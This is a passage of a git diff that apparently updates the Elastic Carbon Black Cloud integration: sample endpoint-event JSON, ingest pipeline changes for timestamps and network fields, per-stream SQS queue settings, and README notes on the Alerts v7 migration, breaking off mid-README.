"user": [ + "NT AUTHORITY\\SYSTEM" + ] + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2022-02-10T11:48:05.000Z", + "carbon_black_cloud": { + "endpoint_event": { + "backend": { + "timestamp": "2022-02-10 11:48:51 +0000 UTC" + }, + "create_time": "2022-02-10T08:03:29.540Z", + "device": { + "external_ip": "89.160.20.156", + "os": "WINDOWS", + "timestamp": "2022-02-10 11:48:05 +0000 UTC" + }, + "event_origin": "EDR", + "organization_key": "XXXXXXXX", + "process": { + "parent": { + "reputation": "REP_RESOLVING" + }, + "publisher": [ + { + "name": "Microsoft Windows", + "state": [ + "FILE_SIGNATURE_STATE_SIGNED", + "FILE_SIGNATURE_STATE_VERIFIED", + "FILE_SIGNATURE_STATE_TRUSTED", + "FILE_SIGNATURE_STATE_OS", + "FILE_SIGNATURE_STATE_CATALOG_SIGNED" + ] + } + ], + "reputation": "REP_RESOLVING", + "terminated": false, + "username": "NT AUTHORITY\\SYSTEM" + }, + "schema": 1, + "scriptload": { + "count": 1, + "effective_reputation": "REP_NOT_LISTED", + "publisher": [ + { + "state": [ + "FILE_SIGNATURE_STATE_NOT_SIGNED" + ] + } + ], + "reputation": "REP_RESOLVING" + }, + "sensor_action": "ACTION_ALLOW", + "type": "endpoint.event.scriptload" + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "ACTION_LOAD_SCRIPT", + "original": "{\"type\":\"endpoint.event.scriptload\",\"process_guid\":\"XXXXXXXX-004e050d-000011f8-00000000-1d81e740ff3ff33\",\"parent_guid\":\"XXXXXXXX-004e050d-00001a48-00000000-1d81e206b2e4f49\",\"backend_timestamp\":\"2022-02-10 11:48:51 +0000 UTC\",\"org_key\":\"XXXXXXXX\",\"device_id\":\"16\",\"device_name\":\"DESKTOP-015\",\"device_external_ip\":\"89.160.20.156\",\"device_os\":\"WINDOWS\",\"device_group\":\"\",\"action\":\"ACTION_LOAD_SCRIPT\",\"schema\":1,\"device_timestamp\":\"2022-02-10 11:48:05 +0000 UTC\",\"create_time\": \"2022-02-10T08:03:29.540Z\",\"process_terminated\":false,\"process_reputation\":\"REP_RESOLVING\",\"parent_reputation\":\"REP_RESOLVING\",\"process_pid\":4600,\"parent_pid\":6728,\"process_publisher\":[{\"name\":\"Microsoft Windows\",\"state\":\"FILE_SIGNATURE_STATE_SIGNED | FILE_SIGNATURE_STATE_VERIFIED | FILE_SIGNATURE_STATE_TRUSTED | FILE_SIGNATURE_STATE_OS | FILE_SIGNATURE_STATE_CATALOG_SIGNED\"}],\"process_path\":\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"parent_path\":\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"process_hash\":[\"24590bf74bbbbfd7d7ac070f4e3c44fd\",\"ae37fd1b642e797b36b9ffcec8a6e986732d011681061800c6b74426c28a9d03\"],\"parent_hash\":[\"2d287989c6f60fa434a345b79b919755\",\"f66196626700ae0728c0269febf2c194f9b73c49dfe7f4fa869d3b96334e5d89\"],\"process_cmdline\":\"\\\"C:\\\\WINDOWS\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"parent_cmdline\":\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\\\" -Embedding\",\"process_username\":\"NT AUTHORITY\\\\SYSTEM\",\"sensor_action\":\"ACTION_ALLOW\",\"event_origin\":\"EDR\",\"scriptload_count\":1,\"scriptload_reputation\":\"REP_RESOLVING\",\"scriptload_effective_reputation\":\"REP_NOT_LISTED\",\"scriptload_publisher\":[{\"state\":\"FILE_SIGNATURE_STATE_NOT_SIGNED\"}]}" + }, + "host": { + "hostname": "DESKTOP-015", + "id": "16", + "ip": [ + "89.160.20.156" + ], + "name": "DESKTOP-015", + "os": { + "type": "windows" + } + }, + "process": { + "command_line": "\"C:\\WINDOWS\\system32\\cscript.exe\" /nologo \"MonitorKnowledgeDiscovery.vbs\"", + "entity_id": "XXXXXXXX-004e050d-000011f8-00000000-1d81e740ff3ff33", + "executable": "c:\\windows\\system32\\cscript.exe", + "hash": { + "md5": "24590bf74bbbbfd7d7ac070f4e3c44fd", + "sha256": "ae37fd1b642e797b36b9ffcec8a6e986732d011681061800c6b74426c28a9d03" + }, + "parent": { + "command_line": "\"C:\\Program Files\\Microsoft Monitoring Agent\\Agent\\MonitoringHost.exe\" -Embedding", + "entity_id": "XXXXXXXX-004e050d-00001a48-00000000-1d81e206b2e4f49", + "executable": "c:\\program files\\microsoft monitoring agent\\agent\\monitoringhost.exe", + "hash": { + "md5": "2d287989c6f60fa434a345b79b919755", + "sha256": "f66196626700ae0728c0269febf2c194f9b73c49dfe7f4fa869d3b96334e5d89" + }, + "pid": 6728 + }, + "pid": 4600 + }, + "related": { + "hash": [ + "24590bf74bbbbfd7d7ac070f4e3c44fd", + "2d287989c6f60fa434a345b79b919755", + "ae37fd1b642e797b36b9ffcec8a6e986732d011681061800c6b74426c28a9d03", + "f66196626700ae0728c0269febf2c194f9b73c49dfe7f4fa869d3b96334e5d89" + ], + "hosts": [ + "DESKTOP-015" + ], + "ip": [ + "89.160.20.156" + ], + "user": [ + "NT AUTHORITY\\SYSTEM" + ] + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/carbon_black_cloud/data_stream/endpoint_event/agent/stream/aws-s3.yml.hbs b/packages/carbon_black_cloud/data_stream/endpoint_event/agent/stream/aws-s3.yml.hbs index 26c4d05045f..a2585da6986 100644 --- a/packages/carbon_black_cloud/data_stream/endpoint_event/agent/stream/aws-s3.yml.hbs +++ b/packages/carbon_black_cloud/data_stream/endpoint_event/agent/stream/aws-s3.yml.hbs @@ -15,7 +15,9 @@ bucket_list_prefix: {{bucket_list_prefix}} {{else}} -{{#if queue_url}} +{{#if queue_url_endpoint_event}} +queue_url: {{queue_url_endpoint_event}} +{{else if queue_url}} queue_url: {{queue_url}} {{/if}} {{#if visibility_timeout}} diff --git a/packages/carbon_black_cloud/data_stream/endpoint_event/elasticsearch/ingest_pipeline/default.yml b/packages/carbon_black_cloud/data_stream/endpoint_event/elasticsearch/ingest_pipeline/default.yml index d1dea8dee9b..c9a7a528ad4 100644 --- a/packages/carbon_black_cloud/data_stream/endpoint_event/elasticsearch/ingest_pipeline/default.yml +++ b/packages/carbon_black_cloud/data_stream/endpoint_event/elasticsearch/ingest_pipeline/default.yml @@ -13,17 +13,34 @@ processors: field: event.original target_field: json ignore_failure: true + - set: + field: _temp_.device_timestamp + copy_from: json.device_timestamp + on_failure: + - remove: + field: json.device_timestamp + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - date: - field: json.create_time - if: ctx.json?.create_time != null && ctx.json.create_time != '' + field: json.device_timestamp + if: ctx.json?.device_timestamp != null && ctx.json.device_timestamp != '' formats: - ISO8601 + - 'yyyy-MM-dd HH:mm:ss Z z' + - 'yyyy-MM-dd HH:mm:ss.S Z z' + - 'yyyy-MM-dd HH:mm:ss.SS Z z' + - 'yyyy-MM-dd HH:mm:ss.SSS Z z' + - 'yyyy-MM-dd HH:mm:ss.SSSS Z z' + - 'yyyy-MM-dd HH:mm:ss.SSSSS Z z' + - 'yyyy-MM-dd HH:mm:ss.SSSSSS Z z' + - 'yyyy-MM-dd HH:mm:ss.SSSSSSS Z z' on_failure: - remove: - field: json.create_time + field: json.device_timestamp - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - rename: field: json.action target_field: event.action @@ -62,7 +79,6 @@ processors: if: ctx.json?.netconn_inbound == false - convert: field: json.remote_port - target_field: source.port type: long ignore_missing: true on_failure: @@ -70,10 +86,9 @@ processors: field: json.remote_port - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - convert: field: json.remote_ip - target_field: source.ip type: ip ignore_missing: true on_failure: @@ -81,20 +96,9 @@ processors: field: json.remote_ip - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' - - append: - field: related.ip - value: '{{{source.ip}}}' - if: ctx.source?.ip != null - allow_duplicates: false - ignore_failure: true - - rename: - field: json.netconn_domain - target_field: source.address - ignore_missing: true + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - convert: field: json.local_port - target_field: client.port type: long ignore_missing: true on_failure: @@ -102,10 +106,9 @@ processors: field: json.local_port - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - convert: field: json.local_ip - target_field: client.ip type: ip ignore_missing: true on_failure: @@ -113,7 +116,44 @@ processors: field: json.local_ip - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - script: + lang: painless + source: | + // These allocations may be futile, but will be cleaned up in the postamble. + if (ctx.client == null) { + ctx.client = new HashMap(); + } + if (ctx.source == null) { + ctx.source = new HashMap(); + } + if (ctx.destination == null) { + ctx.destination = new HashMap(); + } + // Nulls inserted into the document will be cleaned up in the postamble. + ctx.client.ip = ctx.json.local_ip; + ctx.client.port = ctx.json.local_port; + if (ctx.json?.netconn_inbound == true) { + ctx.destination.ip = ctx.json?.local_ip; + ctx.destination.port = ctx.json?.local_port; + ctx.source.ip = ctx.json?.remote_ip; + ctx.source.port = ctx.json?.remote_port; + } else { + ctx.source.ip = ctx.json?.local_ip; + ctx.source.port = ctx.json?.local_port; + ctx.destination.ip = ctx.json?.remote_ip; + ctx.destination.port = ctx.json?.remote_port; + } + - append: + field: related.ip + value: '{{{source.ip}}}' + if: ctx.source?.ip != null + allow_duplicates: false + ignore_failure: true + - rename: + field: json.netconn_domain + target_field: source.address + ignore_missing: true - append: field: related.ip value: '{{{client.ip}}}' @@ -194,7 +234,7 @@ processors: field: json.process_pid - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - rename: field: json.parent_cmdline target_field: process.parent.command_line @@ -217,7 +257,7 @@ processors: field: json.parent_pid - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - rename: field: json.regmod_name target_field: registry.path @@ -294,9 +334,19 @@ processors: field: json.backend_timestamp target_field: carbon_black_cloud.endpoint_event.backend.timestamp ignore_missing: true + - set: + field: carbon_black_cloud.endpoint_event.device.timestamp + copy_from: _temp_.device_timestamp + ignore_empty_value: true + on_failure: + - remove: + field: carbon_black_cloud.endpoint_event.device.timestamp + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - rename: - field: json.device_timestamp - target_field: carbon_black_cloud.endpoint_event.device.timestamp + field: json.create_time + target_field: carbon_black_cloud.endpoint_event.create_time ignore_missing: true - rename: field: json.device_os @@ -320,7 +370,7 @@ processors: field: json.process_duration - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - foreach: field: json.process_publisher processor: @@ -348,7 +398,7 @@ processors: field: json.process_terminated - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - rename: field: json.process_username target_field: carbon_black_cloud.endpoint_event.process.username @@ -398,7 +448,7 @@ processors: field: json.crossproc_target - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - rename: field: json.crossproc_reputation target_field: carbon_black_cloud.endpoint_event.crossproc.reputation @@ -521,7 +571,7 @@ processors: field: json.modload_count - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - foreach: field: json.modload_publisher processor: @@ -554,7 +604,7 @@ processors: field: json.netconn_proxy_ip - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - append: field: related.ip value: '{{{carbon_black_cloud.endpoint_event.netconn.proxy.ip}}}' @@ -580,7 +630,7 @@ processors: field: json.childproc_pid - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - foreach: field: json.childproc_publisher processor: @@ -656,7 +706,7 @@ processors: field: json.scriptload_count - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - rename: field: json.scriptload_hash_md5 target_field: carbon_black_cloud.endpoint_event.scriptload.hash.md5 @@ -695,7 +745,7 @@ processors: field: json.device_internal_ip - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - append: field: host.ip value: '{{{carbon_black_cloud.endpoint_event.device.internal_ip}}}' @@ -718,7 +768,7 @@ processors: field: json.device_external_ip - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - convert: field: json.schema target_field: carbon_black_cloud.endpoint_event.schema @@ -729,7 +779,7 @@ processors: field: json.schema - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - append: field: host.ip value: '{{{carbon_black_cloud.endpoint_event.device.external_ip}}}' @@ -775,6 +825,8 @@ processors: - json.device_external_ip - json.device_internal_ip - json.netconn_proxy_ip + - json.device_timestamp + - _temp_ ignore_missing: true - script: description: Adds all the remaining fields in fields under carbon_black_cloud.endpoint_event. @@ -838,4 +890,4 @@ on_failure: value: pipeline_error - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' diff --git a/packages/carbon_black_cloud/data_stream/endpoint_event/fields/ecs.yml b/packages/carbon_black_cloud/data_stream/endpoint_event/fields/ecs.yml index 0dfa0f183b7..fa3c12ea3f5 100644 --- a/packages/carbon_black_cloud/data_stream/endpoint_event/fields/ecs.yml +++ b/packages/carbon_black_cloud/data_stream/endpoint_event/fields/ecs.yml @@ -2,6 +2,10 @@ name: client.ip - external: ecs name: client.port +- external: ecs + name: destination.ip +- external: ecs + name: destination.port - external: ecs name: dll.hash.md5 - external: ecs diff --git a/packages/carbon_black_cloud/data_stream/endpoint_event/fields/fields.yml b/packages/carbon_black_cloud/data_stream/endpoint_event/fields/fields.yml index af12326154f..e792de11aa9 100644 --- a/packages/carbon_black_cloud/data_stream/endpoint_event/fields/fields.yml +++ b/packages/carbon_black_cloud/data_stream/endpoint_event/fields/fields.yml @@ -237,3 +237,6 @@ - name: type type: keyword description: The event type. + - name: create_time + type: keyword + description: The time at which the event was ingested in carbon black cloud. diff --git a/packages/carbon_black_cloud/data_stream/endpoint_event/manifest.yml b/packages/carbon_black_cloud/data_stream/endpoint_event/manifest.yml index 97d31940eb8..17a921e3466 100644 --- a/packages/carbon_black_cloud/data_stream/endpoint_event/manifest.yml +++ b/packages/carbon_black_cloud/data_stream/endpoint_event/manifest.yml @@ -6,6 +6,15 @@ streams: description: Collect endpoint events from Carbon Black Cloud. template_path: aws-s3.yml.hbs vars: + - name: queue_url_endpoint_event + type: text + title: "[Endpoint Event][SQS] Queue URL" + multi: false + required: false + show_user: true + description: |- + URL of the AWS SQS queue that messages will be received from. This is only required if you want to collect logs via AWS SQS. + This is an endpoint event data stream specific queue URL. This will override the global queue URL if provided. - name: bucket_list_prefix type: text title: "[S3] Bucket Prefix" @@ -60,8 +69,8 @@ streams: required: false show_user: false default: | - - regex: "endpoint_event_logs/" - description: If the SQS queue will have events that correspond to files that this integration shouldn’t process, file_selectors can be used to limit the files that are downloaded. This is a list of selectors which are made up of regex and expand_event_list_from_field options. The regex should match the S3 object key in the SQS message, and the optional expand_event_list_from_field is the same as the global setting. If file_selectors is given, then any global expand_event_list_from_field value is ignored in favor of the ones specified in the file_selectors. Regexes use [RE2 syntax](https://pkg.go.dev/regexp/syntax). Files that don’t match one of the regexes will not be processed. + # - regex: "endpoint_event_logs/" + description: "If the SQS queue will have events that correspond to files that this integration shouldn’t process, file_selectors can be used to limit the files that are downloaded. \nThis is a list of selectors which are made up of regex and expand_event_list_from_field options. The regex should match the S3 object key in the SQS message, and the optional expand_event_list_from_field is the same as the global setting. \nIf file_selectors is given, then any global expand_event_list_from_field value is ignored in favor of the ones specified in the file_selectors. \nRegexes use [RE2 syntax](https://pkg.go.dev/regexp/syntax). Files that don’t match one of the regexes will not be processed.\n[NOTE]: It is recommended to use data stream specific SQS queues instead of file_selectors to avoid data loss." - name: tags type: text title: Tags diff --git a/packages/carbon_black_cloud/data_stream/watchlist_hit/agent/stream/aws-s3.yml.hbs b/packages/carbon_black_cloud/data_stream/watchlist_hit/agent/stream/aws-s3.yml.hbs index 26c4d05045f..3cda66cf74d 100644 --- a/packages/carbon_black_cloud/data_stream/watchlist_hit/agent/stream/aws-s3.yml.hbs +++ b/packages/carbon_black_cloud/data_stream/watchlist_hit/agent/stream/aws-s3.yml.hbs @@ -15,7 +15,9 @@ bucket_list_prefix: {{bucket_list_prefix}} {{else}} -{{#if queue_url}} +{{#if queue_url_watchlist_hit}} +queue_url: {{queue_url_watchlist_hit}} +{{else if queue_url}} queue_url: {{queue_url}} {{/if}} {{#if visibility_timeout}} diff --git a/packages/carbon_black_cloud/data_stream/watchlist_hit/elasticsearch/ingest_pipeline/default.yml b/packages/carbon_black_cloud/data_stream/watchlist_hit/elasticsearch/ingest_pipeline/default.yml index ea4b42d95ae..e8e0806640d 100644 --- a/packages/carbon_black_cloud/data_stream/watchlist_hit/elasticsearch/ingest_pipeline/default.yml +++ b/packages/carbon_black_cloud/data_stream/watchlist_hit/elasticsearch/ingest_pipeline/default.yml @@ -26,7 +26,7 @@ processors: field: json.create_time - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - convert: field: json.severity target_field: event.severity @@ -37,7 +37,7 @@ processors: field: json.severity - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - convert: field: json.device_id target_field: host.id @@ -54,7 +54,7 @@ processors: field: json.schema - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - set: field: host.os.type value: windows @@ -107,7 +107,7 @@ processors: field: json.process_pid - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - rename: field: json.parent_cmdline target_field: process.parent.command_line @@ -130,7 +130,7 @@ processors: field: json.parent_pid - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - append: field: related.user value: '{{{json.parent_username}}}' @@ -231,7 +231,7 @@ processors: field: json.device_internal_ip - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - convert: field: json.device_external_ip target_field: carbon_black_cloud.watchlist_hit.device.external_ip @@ -242,7 +242,7 @@ processors: field: json.device_external_ip - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - append: field: host.ip value: '{{{carbon_black_cloud.watchlist_hit.device.internal_ip}}}' @@ -400,4 +400,4 @@ on_failure: value: pipeline_error - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' diff --git a/packages/carbon_black_cloud/data_stream/watchlist_hit/fields/fields.yml b/packages/carbon_black_cloud/data_stream/watchlist_hit/fields/fields.yml index 25cb25005ea..6fb882ce295 100644 --- a/packages/carbon_black_cloud/data_stream/watchlist_hit/fields/fields.yml +++ b/packages/carbon_black_cloud/data_stream/watchlist_hit/fields/fields.yml @@ -53,6 +53,13 @@ - name: publisher type: group description: signature entry for the process as reported by the endpoint. + fields: + - name: name + type: keyword + description: The name of the publisher. + - name: state + type: keyword + description: The state of the publisher. - name: reputation type: keyword description: Reputation of the actor process; applied when event is processed by the Carbon Black Cloud i.e. after sensor delivers event to the cloud. diff --git a/packages/carbon_black_cloud/data_stream/watchlist_hit/manifest.yml b/packages/carbon_black_cloud/data_stream/watchlist_hit/manifest.yml index 24fc8610729..7f859df620f 100644 --- a/packages/carbon_black_cloud/data_stream/watchlist_hit/manifest.yml +++ b/packages/carbon_black_cloud/data_stream/watchlist_hit/manifest.yml @@ -6,6 +6,15 @@ streams: description: Collect watchlist hit from Carbon Black Cloud. template_path: aws-s3.yml.hbs vars: + - name: queue_url_watchlist_hit + type: text + title: "[Watchlist Hit][SQS] Queue URL" + multi: false + required: false + show_user: true + description: |- + URL of the AWS SQS queue that messages will be received from. This is only required if you want to collect logs via AWS SQS. + This is a watchlist hit data stream specific queue URL. This will override the global queue URL if provided. - name: bucket_list_prefix type: text title: "[S3] Bucket Prefix" @@ -60,8 +69,8 @@ streams: required: false show_user: false default: | - - regex: "watchlist_hit_logs/" - description: If the SQS queue will have events that correspond to files that this integration shouldn’t process, file_selectors can be used to limit the files that are downloaded. This is a list of selectors which are made up of regex and expand_event_list_from_field options. The regex should match the S3 object key in the SQS message, and the optional expand_event_list_from_field is the same as the global setting. If file_selectors is given, then any global expand_event_list_from_field value is ignored in favor of the ones specified in the file_selectors. Regexes use [RE2 syntax](https://pkg.go.dev/regexp/syntax). Files that don’t match one of the regexes will not be processed. + # - regex: "watchlist_hit_logs/" + description: "If the SQS queue will have events that correspond to files that this integration shouldn’t process, file_selectors can be used to limit the files that are downloaded. \nThis is a list of selectors which are made up of regex and expand_event_list_from_field options. The regex should match the S3 object key in the SQS message, and the optional expand_event_list_from_field is the same as the global setting. \nIf file_selectors is given, then any global expand_event_list_from_field value is ignored in favor of the ones specified in the file_selectors. \nRegexes use [RE2 syntax](https://pkg.go.dev/regexp/syntax). Files that don’t match one of the regexes will not be processed.\n[NOTE]: It is recommended to use data stream specific SQS queues instead of file_selectors to avoid data loss." - name: tags type: text title: Tags diff --git a/packages/carbon_black_cloud/docs/README.md b/packages/carbon_black_cloud/docs/README.md index 481162d19ee..f7f0a558d3b 100644 --- a/packages/carbon_black_cloud/docs/README.md +++ b/packages/carbon_black_cloud/docs/README.md @@ -2,9 +2,29 @@ The VMware Carbon Black Cloud integration collects and parses data from the Carbon Black Cloud REST APIs and AWS S3 bucket. -## Compatibility +## Version 2.0.0+ Update Disclaimer +Carbon Black Cloud `Alerts API (v6)` [will be deactivated on July 31, 2024](https://developer.carbonblack.com/reference/carbon-black-cloud/api-migration/#migration-summary). After this, the current alert data stream will become unusable. To enable a smooth transition we have introduced a new data stream named `alert_v7` based on the major `Alerts API (v7)` schema changes and `Data Forwarder 2.0` schema changes. This data stream has significant changes compared to the original data stream and is only available for our new `CEL input` which is currently tagged as `[Beta]`. Please consult the official docs [Alerts v7](https://developer.carbonblack.com/reference/carbon-black-cloud/guides/api-migration/alerts-migration) and [Data Forwarder 2.0](https://developer.carbonblack.com/reference/carbon-black-cloud/data-forwarder/schema/latest/alert-2.0.0/) for further info. After July 31, 2024, the old alerts v6 data stream will be deprecated and removed from the HTTPJSON input and only the new `alert_v7` data stream will exist under the `CEL input`. + +## Version 1.21+ Update Disclaimer +Starting from version 1.21, if using multiple AWS data streams simultaneously configured to use AWS SQS, separate SQS queues should be configured per +data stream. The default values of file selector regexes have been commented out for this reason. The only reason the global queue now exists is to avoid +a breaking change while upgrading to version 1.21 and above. A separate SQS queue per data stream should help fix the data loss that's been occurring in the +older versions. + +## HTTPJSON vs CEL +Version 2.0.0 introduces the use of the CEL input. This input method is currently marked as [Beta] while the older HTTPJSON input method has been +marked as [Legacy]. The HTTPJSON input method will not receive enhancement changes and will not support the new `alert_v7` data stream. + +## Note (Important) +1. Do not enable both the HTTPJSON and CEL input methods within a single data stream; having both enabled simultaneously can cause unexpected/duplicated results, as they operate on the same data streams. + +2. When using the AWS-S3 input, use either the old alert data stream or the new [Beta] alert_v7 data stream that supports the Data Forwarder 2.0 schema. + +3. The `alert_v7` data stream is supported by our new `Alert V7` dashboards. The old `Alert` dashboards will not reflect the new changes. -This module has been tested against `Alerts API (v6)`, `Audit Log Events (v3)` and `Vulnerability Assessment (v1)`. + +## Compatibility +This module has been tested against `Alerts API (v7) [Beta]`, `Alerts API (v6)`, `Audit Log Events (v3)` and `Vulnerability Assessment (v1)`. ## Requirements @@ -15,27 +35,30 @@ This module has been tested against `Alerts API (v6)`, `Audit Log Events (v3)` a | Data Stream Name | Bucket List Prefix | | ----------------- | ---------------------- | + | Alert_v7 | alert_logs_v7 | | Alert | alert_logs | | Endpoint Event | endpoint_event_logs | | Watchlist Hit | watchlist_hit_logs | ### To collect data from AWS SQS, follow the below steps: 1. If data forwarding to an AWS S3 Bucket hasn't been configured, then first setup an AWS S3 Bucket as mentioned in the above documentation. -2. To setup an SQS queue, follow "Step 1: Create an Amazon SQS queue" mentioned in the [Documentation](https://docs.aws.amazon.com/AmazonS3/latest/userguide/ways-to-add-notification-config-to-bucket.html). +2. To set up an SQS queue, follow "Step 1: Create an Amazon SQS queue" mentioned in the [Documentation](https://docs.aws.amazon.com/AmazonS3/latest/userguide/ways-to-add-notification-config-to-bucket.html). - While creating an SQS Queue, please provide the same bucket ARN that has been generated after creating an AWS S3 Bucket. -3. Setup event notification for an S3 bucket. Follow this [Link](https://docs.aws.amazon.com/AmazonS3/latest/userguide/enable-event-notifications.html). - - The user has to perform Step 3 for all the data-streams individually, and each time prefix parameter should be set the same as the S3 Bucket List Prefix as created earlier. (for example, `alert_logs/` for alert data stream.) +3. Set up event notification for an S3 bucket. Follow this [Link](https://docs.aws.amazon.com/AmazonS3/latest/userguide/enable-event-notifications.html). + - The user has to perform Step 3 for all the data streams individually, and each time prefix parameter should be set the same as the S3 Bucket List Prefix as created earlier. (for example, `alert_logs/` for the alert data stream.) - For all the event notifications that have been created, select the event type as s3:ObjectCreated:*, select the destination type SQS Queue, and select the queue that has been created in Step 2. **Note**: - Credentials for the above AWS S3 and SQS input types should be configured using the [link](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-aws-s3.html#aws-credentials-config). - Data collection via AWS S3 Bucket and AWS SQS are mutually exclusive in this case. + - When configuring SQS queues, separate queues should be used for each data stream instead of the global SQS queue from version 1.21 onwards to avoid data + loss. File selectors should not be used to filter out data stream logs using the global queue as it was in versions prior. ### In order to ingest data from the APIs you must generate API keys and API Secret Keys: 1. In Carbon Black Cloud, On the left navigation pane, click **Settings > API Access**. 2. Click Add API Key. 3. Give the API key a unique name and description. - - Select the appropriate access level type. Please check required Access Levels & Permissions for integration in below table. + - Select the appropriate access level type. Please check the required Access Levels & Permissions for integration in the table below. **Note:** To use a custom access level, select Custom from the Access Level type drop-down menu and specify the Custom Access Level. - Optional: Add authorized IP addresses. - You can restrict the use of an API key to a specific set of IP addresses for security reasons. @@ -127,7 +150,6 @@ An example event for `audit` looks as following: "carbon_black_cloud-audit" ] } - ``` **Exported fields** @@ -294,7 +316,6 @@ An example event for `alert` looks as following: "name": "test34@demo.com" } } - ``` **Exported fields** @@ -414,6 +435,424 @@ An example event for `alert` looks as 